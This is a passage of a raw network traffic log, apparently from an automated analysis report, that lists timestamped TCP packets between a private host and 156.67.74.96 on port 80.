Dec 30, 2024 01:58:41.658618927 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658648968 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658684969 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658711910 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658724070 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658746004 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658756971 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658765078 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658765078 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.658811092 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658823013 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658843040 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658854008 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658910990 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658922911 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658950090 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658962965 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658976078 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.658987999 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659008980 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659019947 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659039974 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659054041 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659068108 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659079075 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659107924 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659118891 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.659130096 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663419962 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663433075 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663464069 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663485050 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663535118 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663546085 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663563013 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663583040 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663633108 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663644075 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663681030 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663691998 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663805008 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663921118 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663933039 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663978100 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.663990021 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664011955 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664024115 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664129972 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664140940 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664150953 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664164066 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664186001 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.664196968 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679069042 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679220915 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679234982 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679250002 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679265022 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.679275036 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.679352999 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.797516108 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.797588110 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.797604084 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.797616959 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.797641039 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.797682047 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.797986031 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.798170090 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:41.798257113 CET	50025	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:41.802799940 CET	80	50025	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:47.611609936 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:47.611697912 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.556924105 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.556924105 CET	50024	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.562082052 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.562141895 CET	80	50024	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.562155962 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.562297106 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.562427044 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.567096949 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.567302942 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.567333937 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.567388058 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.572201967 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.729643106 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.734591961 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.734836102 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.734987020 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.739842892 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.886991024 CET	49742	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.912481070 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.912527084 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:56.917382956 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:56.917511940 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.084436893 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.089394093 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089411020 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089426041 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089437008 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089448929 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089471102 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.089502096 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.089555979 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089569092 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089600086 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089612007 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089617014 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.089663029 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.089792967 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.089895964 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.094366074 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094377995 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094399929 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094410896 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094415903 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.094444990 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.094468117 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094470978 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.094481945 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.094515085 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.094533920 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.132847071 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.132978916 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.137794971 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.137852907 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.137890100 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.137921095 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.137964010 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.137980938 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138019085 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138021946 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138086081 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138117075 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138128996 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138164043 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138175964 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138179064 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138214111 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138237953 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138250113 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138283014 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138293982 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138294935 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.138355970 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138367891 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138412952 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138423920 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138452053 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138463974 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138547897 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138560057 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138581038 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138592005 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138680935 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138691902 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138731003 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138741016 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.138756037 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142673969 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142765045 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142776012 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142827988 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142838955 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142882109 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142894030 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142951965 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.142962933 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143021107 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143033028 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143076897 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143166065 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143182993 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143193960 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143218040 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143230915 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143292904 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143304110 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143366098 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143377066 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143429995 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143441916 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143486023 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143496990 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143605947 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143616915 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143629074 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143640041 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143661976 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143673897 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.143688917 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.213107109 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.213124990 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.213140965 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.213234901 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.215054035 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.215070963 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.215085983 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.215162992 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.215810061 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.220752001 CET	80	50028	156.67.74.96	192.168.2.4
Dec 30, 2024 01:58:57.220798969 CET	50028	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:58:57.320322990 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:03.099905014 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:03.099971056 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:03.101710081 CET	80	50026	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:03.101782084 CET	50026	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.898628950 CET	50027	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.900084972 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.901483059 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.903459072 CET	80	50027	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.904952049 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.905025005 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.905179977 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.906259060 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.906313896 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.906426907 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.909909964 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.911243916 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.962224007 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.967122078 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:22.969007015 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.969342947 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:22.974138975 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.258961916 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.258965015 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.263917923 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.263952017 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.318744898 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.323586941 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323606014 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323613882 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323622942 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323631048 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323641062 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323705912 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.323743105 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323754072 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323767900 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.323795080 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.323823929 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.323957920 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.327030897 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.328505993 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328515053 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328552961 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328562021 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328612089 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328624010 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.328644991 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.328819990 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.368702888 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.369239092 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.374012947 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374049902 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374059916 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374190092 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.374229908 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374238968 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374248028 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374255896 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374265909 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374274969 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374283075 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374290943 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374322891 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.374341011 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.374351978 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374368906 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374377966 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374387026 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374394894 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374403954 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374412060 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374419928 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374428034 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374444962 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.374453068 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379215002 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379224062 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379239082 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379246950 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379338026 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379345894 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379354954 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379390955 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379491091 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379499912 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379507065 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379514933 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379529953 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379539967 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379548073 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379556894 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379570961 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379579067 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379638910 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379646063 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379656076 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379663944 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379679918 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379690886 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379705906 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379714012 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379728079 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379736900 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379746914 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379790068 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.379798889 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.447031975 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.447185993 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.447196960 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.447211027 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.447298050 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.458260059 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.458271980 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.458281994 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.458417892 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.519098043 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.519252062 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.519263029 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.519279003 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.519301891 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.519362926 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.519496918 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.519745111 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:23.519848108 CET	50031	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:23.524265051 CET	80	50031	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:29.275305033 CET	80	50030	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:29.275548935 CET	80	50029	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:29.275553942 CET	50030	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:29.275736094 CET	50029	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.289799929 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.290954113 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.294852972 CET	80	50032	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.295042992 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.295042992 CET	50032	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.295882940 CET	80	50033	156.67.74.96	192.168.2.4
Dec 30, 2024 01:59:46.296042919 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.296044111 CET	50033	80	192.168.2.4	156.67.74.96
Dec 30, 2024 01:59:46.299875021 CET	80	50032	156.67.74.96	192.168.2.4
